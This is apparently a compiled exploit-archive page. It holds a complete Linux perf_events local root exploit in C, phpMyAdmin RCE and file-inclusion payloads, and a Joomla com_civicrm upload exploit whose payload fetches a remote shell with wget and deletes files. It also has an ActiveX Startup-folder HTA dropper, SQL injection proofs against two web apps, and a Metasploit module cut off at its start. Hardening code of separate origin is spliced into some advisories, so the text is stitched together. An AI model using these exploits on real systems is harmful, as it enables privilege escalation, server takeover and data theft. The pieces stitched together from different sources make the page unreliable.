Linux PERF_EVENTS – Local Root Exploit

Code for the local root exploit reported to be effective against linux 2.6.37-3.x.x x86_64, in its ~100 LOC version.

/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
  int i,j,k;
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
  uint64_t kbase = ((uint64_t)current)>>36;
  uint32_t *fixptr = (void*) AB(1);
  *fixptr = -1;

  for (i=0; i<4000; i+=4) {
    uint64_t *p = (void *)&current[i];
    uint32_t *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
      if (((uint32_t*)uids)[k] != t[j+k]) goto next;
      for (i = 0; i < 8; i++) t[j+i] = 0;
      for (i = 0; i < 10; i++) t[j+9+i] = -1;
      return;
next:;    }
  }
}

void sheep(uint32_t off) {
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
  int fd = syscall(298, buf, 0, -1, -1, 0);
  assert(!close(fd));
}


int main() {
  uint64_t  u,g,needle, kbase, *p; uint8_t *code;
  uint32_t *map, j = 5;
  int i;
  struct {
    uint16_t limit;
    uint64_t addr;
  } __attribute__((packed)) idt;
  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
  memset(map, 0, SIZE);
  sheep(-1); sheep(-2);
  for (i = 0; i < SIZE/4; i++) if (map[i]) {
    assert(map[i+1]);
    break;
  }
  assert(i<SIZE/4);
  asm ("sidt %0" : "=m" (idt));
  kbase = idt.addr & 0xff000000;
  u = getuid(); g = getgid();
  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
  setresuid(u,u,u); setresgid(g,g,g);
  while (j--) {
    needle = AB(j+1);
    assert(p = memmem(code, 1024, &needle, 8));
    if (!p) continue;
    *p = j?((g<<32)|u):(idt.addr + 0x48);
  }
  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
  asm("int $0x4");  assert(!setuid(0));
  return execl("/bin/bash", "-sh", NULL);
}

phpMyAdmin 3.5.8 and 4.0.0-RC2 – Multiple Vulnerabilities

phpMyAdmin 3.5.8 and 4.0.0-RC2 – a public vulnerability has been found in these versions; the details of the vulnerability are as follows.

[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
===============================================================================

Author: Janek Vind "waraxe"
Date: 25. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-103.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the World Wide Web. phpMyAdmin supports a wide
range of operations with MySQL.

http://www.phpmyadmin.net/home_page/index.php

###############################################################################
1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php"
###############################################################################

Reason:
  1. insufficient sanitization of user data before using in preg_replace
Attack vectors:
  1. user-supplied parameters "from_prefix" and "to_prefix"
Preconditions:
  1. logged in as valid PMA user
  2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex)
  
PMA security advisory: PMASA-2013-2
CVE id: CVE-2013-3238

Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2
  
Result: PMA user is able to execute arbitrary PHP code on webserver

Let's take a look at the source code:

Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8):
------------------------[ source code start ]----------------------------------
case 'replace_prefix_tbl':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
    $a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' . 
                        PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN
    $run_parts = true;
    break;

case 'copy_tbl_change_prefix':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
    $a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM '
          . PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN
    $run_parts = true;
    break;
------------------------[ source code end ]------------------------------------

We can see that the PHP variables "$from_prefix" and "$to_prefix" are passed to
the preg_replace function without any sanitization. Those variables come from
the user-submitted POST request as the parameters "from_prefix" and "to_prefix".
It is possible to inject the e-modifier followed by a terminating null byte via
the first parameter and PHP code via the second parameter. On successful
exploitation the injected PHP code is executed on the PMA web server.
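The same prefix-rename step in a hardened form, as an added example that is not phpMyAdmin's code; the function names are assumptions:

```php
<?php
// Added example, not phpMyAdmin's code: the prefix-replacement step from
// mult_submits.inc.php with the user-controlled prefixes validated and escaped.

// Vulnerable shape from the advisory, kept only for comparison. The prefix is
// concatenated straight into the pattern, so a from_prefix of "/e\0" closes the
// pattern, adds the e-modifier and hides the rest behind a NUL byte; to_prefix
// is then evaluated as PHP by preg_replace (PHP < 5.4.7).
function renamePrefixUnsafe(string $table, string $fromPrefix, string $toPrefix): ?string
{
    return preg_replace("/^" . $fromPrefix . "/", $toPrefix, $table);
}

// Hardened form: an allowlist on both prefixes (unquoted MySQL identifier
// characters only; the D modifier stops "$" from accepting a trailing newline),
// then preg_quote() with the delimiter argument as defence in depth.
function renamePrefixSafe(string $table, string $fromPrefix, string $toPrefix): string
{
    foreach (['from_prefix' => $fromPrefix, 'to_prefix' => $toPrefix] as $name => $value) {
        if (!preg_match('/^[A-Za-z0-9_]{0,64}$/D', $value)) {
            throw new InvalidArgumentException("Invalid characters in $name");
        }
    }
    $pattern = '/^' . preg_quote($fromPrefix, '/') . '/';
    $newName = preg_replace($pattern, $toPrefix, $table);
    if ($newName === null || $newName === '') {
        throw new RuntimeException('Prefix replacement failed');
    }
    return $newName;
}

// Demonstration: a legitimate rename works, the advisory's payload is refused
// before it ever reaches preg_replace.
echo renamePrefixSafe('wp_users', 'wp_', 'blog_'), "\n";   // blog_users
try {
    renamePrefixSafe('wp_users', "/e\0", 'phpinfo()');
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```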

Tests:

1. Log in to PMA and select database:

http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8

2. Select one table from the database using its checkbox, then choose
"Replace table prefix" from the "With selected:" select control.

3. We can see form named "Replace table prefix:" with two input fields.
Type "/e%00" to the "From" field and "phpinfo()" to the "To" field.

4. Activate Tamper Data Firefox add-on:

https://addons.mozilla.org/en-us/firefox/addon/tamper-data/

5. Click "Submit", Tamper Data pops up, choose "Tamper".

6. Now we can modify POST request. Look for parameter "from_prefix".
It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00".
Click "OK" and Firefox will send out manipulated POST request.

7. We are greeted by phpinfo function output - code execution is confirmed.

PMA version 4.0.0-RC2 contains an almost identical vulnerability:

Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2):
------------------------[ source code start ]----------------------------------
case 'replace_prefix_tbl':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
    $a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) . 
        ' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN
    $run_parts = true;
    break;

case 'copy_tbl_change_prefix':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
    $a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) . 
      ' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN
    $run_parts = true;
    break;
------------------------[ source code end ]------------------------------------


############################################################################
2. Locally Saved SQL Dump File Multiple File Extension Remote Code Execution
############################################################################

Reason:
  1. insecure names of locally saved dump files
Attack vectors:
  1. user-supplied POST parameter "filename_template"
Preconditions:
  1. logged in as valid PMA user
  2. configuration setting "SaveDir" defined and pointed to a directory
     which is writable for PHP and directly accessible over the web
     (by default "SaveDir" is empty and PMA is secure)
  3. Apache webserver with unknown MIME for "sql" extension
  
PMA security advisory: PMASA-2013-3
CVE id: CVE-2013-3239

Affected are PMA versions 3.5.8 and 4.0.0-RC2

There is a security weakness in the way PMA handles locally saved
database dump files. A saved dump file can have multiple extensions,
and if the Apache web server does not know the MIME type of the "sql"
extension (which is the default), then for example a "foobar.php.sql"
file will be treated as a PHP file.

More information:

http://httpd.apache.org/docs/2.2/mod/mod_mime.html

section "Files with Multiple Extensions"

http://www.acunetix.com/websitesecurity/upload-forms-threat/

section "Case 4: Double extensions (part 1)"


Test:

1. Activate export to the local server, making sure the directory is writable:

$cfg['SaveDir'] = './';

2. Select a database for the test and insert a row into a table containing
PHP code such as "<?php phpinfo();?>"

3. Try to export that database or table; there is now an additional option:

"Save on server in the directory ./"

Confirm that option and leave the format as "SQL".
Change "File name template" to "@DATABASE ()  php" and click the "Go" button.

Server responds with "Dump has been saved to file ./test.php.sql."

4. Request the created file with a web browser:

http://localhost/PMA/test.php.sql

On success we see the output of the phpinfo() function, which
confirms remote code execution.
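Building the on-server dump filename so that no second extension survives, as an added example that is not phpMyAdmin's code; the function name and the placeholder handling are assumptions:

```php
<?php
// Added example, not phpMyAdmin's code: deriving the saved dump filename from
// the user-supplied template so that mod_mime never sees a second, executable
// extension such as the ".php" in "test.php.sql".

// Expands the template (only @DATABASE@ and @TABLE@ are honoured here) and
// collapses the result to exactly one allowlisted extension chosen from the
// export format, not from the template.
function safeDumpFilename(string $template, string $database, string $table, string $format): string
{
    $allowedExtensions = ['sql' => 'sql', 'csv' => 'csv', 'xml' => 'xml'];
    $format = strtolower($format);
    if (!isset($allowedExtensions[$format])) {
        throw new InvalidArgumentException('Unsupported export format');
    }
    $name = strtr($template, ['@DATABASE@' => $database, '@TABLE@' => $table]);
    // Replace path separators, NUL bytes and every dot: dots are what Apache's
    // multiple-extension handling keys on when ".sql" has no MIME type.
    $name = preg_replace('/[^A-Za-z0-9_-]/', '_', $name);
    $name = trim($name, '_');
    if ($name === '') {
        $name = 'dump';
    }
    return $name . '.' . $allowedExtensions[$format];
}

// Demonstration with constructed inputs modelled on the advisory's test
echo safeDumpFilename('@DATABASE@', 'test', '', 'SQL'), "\n";        // test.sql
echo safeDumpFilename('@DATABASE@.php', 'test', '', 'SQL'), "\n";    // test_php.sql
echo safeDumpFilename('../../foobar.php', 'test', '', 'SQL'), "\n";  // foobar_php.sql
```

On the Apache side, assigning a type to the extension (for example `AddType text/plain .sql`) or disabling the PHP engine for the SaveDir directory closes the same mod_mime path independently of the filename logic.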


###############################################################################
3. Local File Inclusion in "export.php"
###############################################################################

Reason:
  1. insufficient sanitization of user data before using in include_once
Attack vectors:
  1. user-supplied POST parameter "what"
Preconditions:
  1. logged in as valid PMA user
  2. PHP must be < 5.3.4 for null-byte attacks to work

PMA security advisory: PMASA-2013-4
CVE id: CVE-2013-3240

Affected is PMA version 4.0.0-RC2


Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
    $GLOBALS[$one_post_param] = $one_post_value;
}

PMA_Util::checkParameters(array('what', 'export_type'));

// export class instance, not array of properties, as before
$export_plugin = PMA_getPlugin(
    "export",
    $what,
    'libraries/plugins/export/',
    array(
        'export_type' => $export_type,
        'single_table' => isset($single_table)
    )
);
------------------------[ source code end ]------------------------------------


We can see that the user-supplied parameter "what" is used as the second argument
of the function PMA_getPlugin(). Let's follow the execution flow:


Php script "libraries/plugin_interface.lib.php" line 20:
------------------------[ source code start ]----------------------------------
function PMA_getPlugin(
    $plugin_type,
    $plugin_format,
    $plugins_dir,
    $plugin_param = false
) {
    $GLOBALS['plugin_param'] = $plugin_param;
    $class_name = strtoupper($plugin_type[0])
        . strtolower(substr($plugin_type, 1))
        . strtoupper($plugin_format[0])
        . strtolower(substr($plugin_format, 1));
    $file = $class_name . ".class.php";
    if (is_file($plugins_dir . $file)) {
        include_once $plugins_dir . $file;
------------------------[ source code end ]------------------------------------

As seen above, the second argument "$plugin_format" is used to build the variable
"$file", which is then passed to is_file() and include_once. No sanitization is
applied to the user-submitted parameter "what", which leads to a directory
traversal and local file inclusion vulnerability. With older PHP versions it may
be possible to use a null byte attack and include arbitrary files on the server.


###############################################################################
4. $GLOBALS array overwrite in "export.php"
###############################################################################

Reason:
  1. insecure POST parameters importing
Attack vectors:
  1. user-supplied POST parameters
Preconditions:
  1. logged in as valid PMA user

PMA security advisory: PMASA-2013-5
CVE id: CVE-2013-3241

Affected is PMA version 4.0.0-RC2


Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
    $GLOBALS[$one_post_param] = $one_post_value;
}

PMA_Util::checkParameters(array('what', 'export_type'));
------------------------[ source code end ]------------------------------------

We can see that arbitrary entries in the $GLOBALS array can be overwritten by
submitting POST parameters. Importing input this way must be considered very
insecure, since in the right situation it allows any variable in the global
scope to be overwritten. This opens many avenues of exploitation; one of them
is presented below.


Php script "export.php" line 59:
------------------------[ source code start ]----------------------------------
$onserver = false;
$save_on_server = false;
...
 if ($quick_export) {
        $onserver = $_REQUEST['quick_export_onserver'];
    } else {
        $onserver = $_REQUEST['onserver'];
    }
    // Will we save dump on server?
    $save_on_server = ! empty($cfg['SaveDir']) && $onserver;
...
// Open file on server if needed
if ($save_on_server) {
    $save_filename = PMA_Util::userDir($cfg['SaveDir'])
        . preg_replace('@[/\\\\]@', '_', $filename);
...
    if (! $file_handle = @fopen($save_filename, 'w')) {
        $message = PMA_Message::error(
...
/* If we saved on server, we have to close file now */
    if ($save_on_server) {
        $write_result = @fwrite($file_handle, $dump_buffer);
        fclose($file_handle);
------------------------[ source code end ]------------------------------------

As seen above, when the configuration setting "SaveDir" is set, a database dump
can be saved on the PMA web server. By default "SaveDir" is unset, which
prevents the problems described here. Because any variable in the global scope
can be overwritten, "SaveDir" can be set to an arbitrary value. This leads to a
directory traversal vulnerability: an attacker can save a database dump to any
directory on the web server, as long as the filesystem permissions allow it.
The dump can carry the ".sql" extension. If the attacker can dump a database
containing PHP code and tags, that content ends up in the dump file. If the
filename is something like "foobar.php.sql", most Apache installations will by
default try to parse the dump file as PHP, which can finally lead to remote
code execution.
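The export.php request handling from sections 3 and 4 without the $GLOBALS import, plus a plugin loader that refuses traversal, as an added example that is not phpMyAdmin's code; the function names and the directory layout are assumptions:

```php
<?php
// Added example, not phpMyAdmin's code: explicit parameter extraction for
// export.php (section 4) and a traversal-safe plugin lookup (section 3).

// Instead of copying every POST key into $GLOBALS (which is what let a request
// overwrite $cfg['SaveDir']), read only the parameters the script needs.
function readExportParams(array $post): array
{
    $params = [];
    foreach (['what', 'export_type', 'onserver', 'filename'] as $key) {
        $params[$key] = isset($post[$key]) && is_string($post[$key]) ? $post[$key] : null;
    }
    if ($params['what'] === null || $params['export_type'] === null) {
        throw new InvalidArgumentException('Missing what/export_type');
    }
    return $params;
}

// "what" becomes part of a filename handed to include_once, so it is limited to
// plugin-name characters, and the resolved path is additionally checked to lie
// inside the plugins directory (this second check survives a loosened allowlist).
function resolveExportPlugin(string $pluginsDir, string $what): string
{
    if (!preg_match('/^[A-Za-z0-9]{1,32}$/D', $what)) {
        throw new InvalidArgumentException('Invalid export plugin name');
    }
    // Same class naming as PMA_getPlugin: "sql" -> ExportSql.class.php
    $className = 'Export' . ucfirst(strtolower($what));
    $base = realpath($pluginsDir);
    $file = realpath($pluginsDir . '/' . $className . '.class.php');
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('Export plugin not found');
    }
    return $file;
}

// Demonstration on a constructed request: the injected "cfg" key is simply
// ignored, and a traversal attempt in "what" is refused before any file access.
$post = ['what' => 'sql', 'export_type' => 'database', 'cfg' => ['SaveDir' => '/var/www/html']];
$params = readExportParams($post);
var_dump(isset($params['cfg']));   // bool(false)
try {
    resolveExportPlugin('libraries/plugins/export', '../../../../etc/passwd%00');
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```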



Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

16.04.2013 -> Sent email to developers
16.04.2013 -> First response email from developers
16.04.2013 -> Sent detailed information to developers
24.04.2013 -> New PMA versions and security advisories released
25.04.2013 -> Current advisory released


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------

joomla component com_civicrm remote code injection exploit

In tests I performed on the Joomla com_civicrm component, a vulnerability originating from “ofc_upload_image.php” was found.

When we request administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=xxx.php, it can be seen that the file administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/xxx.php is created. Through this vulnerability, using the exploit I compiled below, any kind of shell can be run on the server. As is clear from the contents of the exploit I wrote below, its use is simple. It can be run from a localhost command prompt, or by the back-connect method. The exploit fetches shell.txt remotely into the vulnerable directory, turns shell.txt into shell.php with the mv command, moves shell.php to the site.com/tmp directory, and then destroys the vulnerable /tmp-upload-images/ folder and its contents, fixing the vulnerability.

You can also perform the PHP code injection manually, using the Firefox HttpRequester add-on.


# Exploit Title: joomla component com_civicrm remote file injection exploit
# Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart"
# Date: 20/04/2013
# Exploit Author: iskorpitx
# Vendor Homepage: http://civicrm.org
# Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422
# Version: [civicrm 4.2.2]
# Tested on: Win8 Pro x64
# CVE : http://www.securityweb.org

<?php

# Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote file upload exploit
# http://www.securityweb.org & http://www.security.biz.tr
# multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php

$options = getopt('u:f:');

if(!isset($options['u'], $options['f']))
die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n
-u http://target.com/ The full path to Joomla!
-f post.php The name of the file to create.\n");

$url = $options['u'];
$file = $options['f'];
$shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}";
$url = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}";
$data = '<?php
 system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php");
 system("cp post.php ../../../../../../../tmp/post.php");
 system("cd ..; rm -rf tmp-upload-images");
 echo "by iskorpitx" ;
 fclose ( $handle );
 ?>';
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');

echo " [+] Submitting request to: {$options['u']}\n";

$handle = curl_init();

curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);

$source = curl_exec($handle);
curl_close($handle);

if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r'))
{
echo " [+] Exploit completed successfully!\n";
echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
}
else
{
die(" [+] Exploit was unsuccessful.\n");
}

?>

LiquidXML Studio 2010 ActiveX Remote 0-day

<html>
<object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='target'></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2010 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {E68E401C-7DB0-4F3A-88E1-159882468A79}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Been sitting on this one so long it could've hatched twice.
</body>
</html>

Free Hosting Manager V2.0.2 Multiple SQLi

Exploit for the general SQL injection vulnerability in Free Hosting Manager V2.0.2

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi
# Author        : Saadat Ullah , saadi_linux@rocketmail.com
# Author home   : http://security-geeks.blogspot.com
# Date          : 23/3/13
# Vendors       : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php

-------------------------------------------------------------------------
 --- [ Multiple SQL injection] ---
It is vulnerable to SQLi in many files; some of them are:

http://localhost/Free/clients/reset.php?code=[SQLi]


http://localhost/Free/clients/tickets.php?id=[SQLi]


http://localhost/free/clients/viewaccount.php?id=[SQLi]

Cookie based injection in

http://localhost/free/clients/home.php

inject the cookie value clientuser
http://localhost/free/clients/register.php --->  SQLi on all POST Fields.

Proof Of Concept
In home.php
a function auth() is called; this is what it does:

if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {

$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());


In Reset.php

http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET['do'] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());

In tickets.php

http://localhost/Free/clients/tickets.php?id=[SQLi]

if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());

In Viewaccount.php

http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")

Only using stripslashes, which will not protect against an SQL injection attack.

#independent Pakistani Security Researcher


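The cookie and ticket lookups quoted above rewritten with bound parameters, as an added example that is not Free Hosting Manager's code; the function names and the $pdo connection are assumptions, the table and column names follow the advisory:

```php
<?php
// Added example, not Free Hosting Manager's code: the clients/tickets lookups
// from the advisory with PDO prepared statements, which is what stripslashes()
// cannot provide. $pdo is assumed to be a PDO connection to the same database
// with PDO::ATTR_EMULATE_PREPARES set to false.

function clientFromCookies(PDO $pdo, array $cookie): ?array
{
    foreach (['clientid', 'clientuser', 'clientpass'] as $name) {
        if (!isset($cookie[$name]) || !is_string($cookie[$name])) {
            return null;   // unauthenticated; never "return true" before the query
        }
    }
    // Placeholders keep quotes, comments and UNIONs in the cookie values as data;
    // the id is cast because the schema column is numeric.
    $stmt = $pdo->prepare(
        'SELECT * FROM clients WHERE id = :id AND username = :user AND password = :pass LIMIT 1'
    );
    $stmt->execute([
        ':id'   => (int) $cookie['clientid'],
        ':user' => $cookie['clientuser'],
        ':pass' => $cookie['clientpass'],
    ]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function ticketForClient(PDO $pdo, $ticketId, int $clientId): ?array
{
    // tickets.php reads the id straight from the query string; reject anything
    // that is not a plain unsigned integer before it reaches the database.
    if (!ctype_digit((string) $ticketId)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM tickets WHERE id = ? AND clientid = ?');
    $stmt->execute([(int) $ticketId, $clientId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

The same pattern applies to reset.php, viewaccount.php and the register.php INSERT: every value that originates in $_GET, $_POST or $_COOKIE travels as a bound parameter, never inside the SQL string.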
ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

Exploit for the ClipShare 4.1.1 (gmembers.php, gid param) Blind SQL Injection vulnerability

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerability works only if there is a group added to the community
#Last Checked: 24 March 2013

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23 

=========================== BEGIN OF gmembers.php =============================================

<?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require('include/config.php');
require('include/function.php');
require('classes/pagination.class.php');
require('language/' .$_SESSION['language']. '/gmembers.lang.php');

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1";
$rs     = $conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
    $urlkey     = $rs->fields['gurl'];
    $gname      = $rs->fields['gname'];
    $gupload    = $rs->fields['gupload'];
    $oid        = $rs->fields['OID'];
    STemplate::assign('gname', $gname);
    STemplate::assign('gurl', $urlkey);
    STemplate::assign('gupload', $gupload);
} else {
    session_write_close();
    header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
    die();
}
...........................................;
...............................................

?>

============================================================================================================


Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  return normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  return page with some errors ( or with nothing - white page )



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution Vulnerability

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require &#39;msf/core&#39;

class Metasploit3  < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
